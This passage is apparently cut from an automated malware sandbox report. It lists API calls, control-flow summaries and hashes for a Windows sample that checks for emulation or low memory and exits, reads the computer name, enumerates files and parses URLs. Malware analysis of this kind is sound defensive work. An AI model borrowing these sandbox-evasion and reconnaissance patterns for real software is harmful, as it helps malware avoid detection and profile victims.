                                  • Opcode ID: 8b33f9e69bb25ac64f3fb03db0cee6d74af95ee2853ca37b349af3bf72169804
                                  • Instruction ID: 128e346dd2afaf361e3c0e669e5b45d2d9c01524a3aaa42e6b3a6ed9c877c006
                                  • Opcode Fuzzy Hash: 8b33f9e69bb25ac64f3fb03db0cee6d74af95ee2853ca37b349af3bf72169804
                                  • Instruction Fuzzy Hash: DA318DB1D482099FCB05CFB89D899EFBFBCEF58710F10416AE509F7654E6348A408BA1

                                  Control-flow Graph

                                  control_flow_graph 2793 344bc0-344bce 2794 344bd0-344bd5 2793->2794 2794->2794 2795 344bd7-344c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 342a20 2794->2795
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00344BF7
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00344C01
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00344C0B
                                  • lstrlen.KERNEL32(?,00000000,?), ref: 00344C1F
                                  • InternetCrackUrlA.WININET(?,00000000), ref: 00344C27
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??2@$CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1683549937-4251816714
                                  • Opcode ID: 05076f31b89b8bd4171d28e9e7c962f5a07143690ee8e57cba7296ea024ae095
                                  • Instruction ID: 1b6541caed6c8641bca87699f7d37da00669ebbdef801893462fe6e710d78c58
                                  • Opcode Fuzzy Hash: 05076f31b89b8bd4171d28e9e7c962f5a07143690ee8e57cba7296ea024ae095
                                  • Instruction Fuzzy Hash: B7012171D00218ABDB10DFA8EC49B9EBBF8EB14320F004166F954E7390DB7459058FD4

                                  Control-flow Graph

                                  control_flow_graph 2798 341030-341055 GetCurrentProcess VirtualAllocExNuma 2799 341057-341058 ExitProcess 2798->2799 2800 34105e-34107b VirtualAlloc 2798->2800 2801 341082-341088 2800->2801 2802 34107d-341080 2800->2802 2803 3410b1-3410b6 2801->2803 2804 34108a-3410ab VirtualFree 2801->2804 2802->2801 2804->2803
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00341046
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 0034104D
                                  • ExitProcess.KERNEL32 ref: 00341058
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0034106C
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003410AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                  • String ID:
                                  • API String ID: 3477276466-0
                                  • Opcode ID: a947155df047b7b22b95c3ba2bd4a28110caca89bfc9529835a5dbfcd54345ac
                                  • Instruction ID: fee809cb36f3d0fefbf5a389ac257ac244682bc5079d54090c014138696f6816
                                  • Opcode Fuzzy Hash: a947155df047b7b22b95c3ba2bd4a28110caca89bfc9529835a5dbfcd54345ac
                                  • Instruction Fuzzy Hash: 6701F4717802047BE7204A657C1EF6B77EDA794B05F308014F708E72C0DAB1E944A674

                                  Control-flow Graph

                                  control_flow_graph 2805 35ee90-35eeb5 call 342930 2808 35eeb7-35eebf 2805->2808 2809 35eec9-35eecd call 346c40 2805->2809 2808->2809 2810 35eec1-35eec3 lstrcpy 2808->2810 2812 35eed2-35eee8 StrCmpCA 2809->2812 2810->2809 2813 35ef11-35ef18 call 342a20 2812->2813 2814 35eeea-35ef02 call 342a20 call 342930 2812->2814 2820 35ef20-35ef28 2813->2820 2824 35ef45-35efa0 call 342a20 * 10 2814->2824 2825 35ef04-35ef0c 2814->2825 2820->2820 2822 35ef2a-35ef37 call 342930 2820->2822 2822->2824 2829 35ef39 2822->2829 2825->2824 2828 35ef0e-35ef0f 2825->2828 2831 35ef3e-35ef3f lstrcpy 2828->2831 2829->2831 2831->2824
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035EEC3
                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 0035EEDE
                                  • lstrcpy.KERNEL32(00000000,ERROR), ref: 0035EF3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: ERROR
                                  • API String ID: 3722407311-2861137601
                                  • Opcode ID: 25e114d1455892bdffe2d1dc116a4a96226cc62bd8aa47f8401da12b9e023e2d
                                  • Instruction ID: 7f68608e1e7481507e7eb4c94fe01c1bb9bc05e39acd4ba6e777c7220ed9e563
                                  • Opcode Fuzzy Hash: 25e114d1455892bdffe2d1dc116a4a96226cc62bd8aa47f8401da12b9e023e2d
                                  • Instruction Fuzzy Hash: 5C21FC316202469BCB27BF78DC46A9B37E4AF14301F455428BC4AEF252DF30F9648BA0

                                  Control-flow Graph

                                  control_flow_graph 2886 3410c0-3410cb 2887 3410d0-3410dc 2886->2887 2889 3410de-3410f3 GlobalMemoryStatusEx 2887->2889 2890 3410f5-341106 2889->2890 2891 341112-341114 ExitProcess 2889->2891 2892 341108 2890->2892 2893 34111a-34111d 2890->2893 2892->2891 2894 34110a-341110 2892->2894 2894->2891 2894->2893
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: 1ef247d9adbb3dc635a1fc77a50779428fee8c8b7127956c3eb2d10b7ba3e52a
                                  • Instruction ID: 7860309e427e232bbe022a07a34130fb51a5d9971de8af1cde6da769063f1475
                                  • Opcode Fuzzy Hash: 1ef247d9adbb3dc635a1fc77a50779428fee8c8b7127956c3eb2d10b7ba3e52a
                                  • Instruction Fuzzy Hash: 92F05C70128A444BEB516B64EC0A32DF7D8EB14350F100929DE9FCA180E230E8C0E137

                                  Control-flow Graph
                                  • Rendered graph not captured; block summary recovered from the graph data: the entry block 358c88-358cc4 calls StrCmpCA and branches to 358cc6-358cc7 (ExitProcess) or to 358ccd-358ce6; from 358cff the function fans out into a series of StrCmpCA and lstrlen comparison blocks (358d06 through 358e9a), each of which either rejoins the common exit at 358ec3-358edc (followed by 358ee2-358eef, call 342a20) or calls 342a20/342930; the path through 358eb3-358eb9 ends in lstrcpy at 358ebb-358ebd.
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 242a339f7e876638c0382de0775c109ca33a4dac420aa4d0053cee65047cdfdb
                                  • Instruction ID: d4e65c2a472b3d58f4f66b8d3894c7f2460af51e3eea931abbf8aaa2ff27b66e
                                  • Opcode Fuzzy Hash: 242a339f7e876638c0382de0775c109ca33a4dac420aa4d0053cee65047cdfdb
                                  • Instruction Fuzzy Hash: 54E0DFA1A20344FBCB009BA8FC98A867B7CFF11300B014054E90873221DB30AC0ADBA8

                                  Control-flow Graph
                                  • Rendered graph not captured; block summary recovered from the graph data: a single block 362ad0-362b22 calls GetProcessHeap, RtlAllocateHeap and GetComputerNameA, then branches to 362b44-362b59 or 362b24-362b36.
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00362AFF
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00362B06
                                  • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00362B1A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 62f931f7938da737445c11aa8d70b1cde2966d0a38f5e3a1ee881167263e0243
                                  • Instruction ID: 502a08be5ac2a8b1a182d1b7f06d719dfd699b6323c4fd794df8ae86da5f0b0e
                                  • Opcode Fuzzy Hash: 62f931f7938da737445c11aa8d70b1cde2966d0a38f5e3a1ee881167263e0243
                                  • Instruction Fuzzy Hash: C101D676A44608ABC710CF99ED49B9EF7B8F744B21F00426AF919E3780D774190487B1
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003523D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003523F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00352402
                                  • lstrlen.KERNEL32(\*.*), ref: 0035240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00352436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0035246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00352486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: aad919a780cd2e7a5189887421f58173eef76d0a8543afca360e734d0ab23abc
                                  • Instruction ID: 73e036bf96861614040264a201f33e82a78feee2073854e385f413d294e1af02
                                  • Opcode Fuzzy Hash: aad919a780cd2e7a5189887421f58173eef76d0a8543afca360e734d0ab23abc
                                  • Instruction Fuzzy Hash: DAA27D31911616ABCB23AF74DC89EAF77B8AF15301F454024FC09EB261DB34ED599BA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 003416E2
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00341719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034176C
                                  • lstrcat.KERNEL32(00000000), ref: 00341776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003417A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003417EF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003417F9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341825
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341875
                                  • lstrcat.KERNEL32(00000000), ref: 0034187F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003418AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003418F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003418FE
                                  • lstrlen.KERNEL32(00371794), ref: 00341909
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341929
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341935
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034195B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341966
                                  • lstrlen.KERNEL32(\*.*), ref: 00341971
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034198E
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 0034199A
                                    • Part of subcall function 00364040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0036406D
                                    • Part of subcall function 00364040: lstrcpy.KERNEL32(00000000,?), ref: 003640A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003419C3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341A0E
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341A16
                                  • lstrlen.KERNEL32(00371794), ref: 00341A21
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341A41
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341A4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341A76
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341A81
                                  • lstrlen.KERNEL32(00371794), ref: 00341A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341AAC
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341AB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341ADE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341AE9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341B11
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00341B45
                                  • StrCmpCA.SHLWAPI(?,003717A0), ref: 00341B70
                                  • StrCmpCA.SHLWAPI(?,003717A4), ref: 00341B8A
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00341BC4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341BFB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341C03
                                  • lstrlen.KERNEL32(00371794), ref: 00341C0E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341C31
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341C3D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341C69
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341C74
                                  • lstrlen.KERNEL32(00371794), ref: 00341C7F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341CA2
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341CAE
                                  • lstrlen.KERNEL32(?), ref: 00341CBB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341CDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00341CE9
                                  • lstrlen.KERNEL32(00371794), ref: 00341CF4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341D14
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341D20
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341D46
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341D51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341D7D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341DE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341DEB
                                  • lstrlen.KERNEL32(00371794), ref: 00341DF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341E19
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341E25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341E4B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00341E56
                                  • lstrlen.KERNEL32(00371794), ref: 00341E61
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341E81
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00341E8D
                                  • lstrlen.KERNEL32(?), ref: 00341E9A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341EBA
                                  • lstrcat.KERNEL32(00000000,?), ref: 00341EC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341EF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00341F3E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00341F45
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 00341F9F
                                  • lstrlen.KERNEL32(00FA8858), ref: 00341FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00341FE3
                                  • lstrlen.KERNEL32(00371794), ref: 00341FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0034200E
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 0034201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00342042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0034204D
                                  • lstrlen.KERNEL32(00371794), ref: 00342058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00342075
                                  • lstrcat.KERNEL32(00000000,00371794), ref: 00342081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
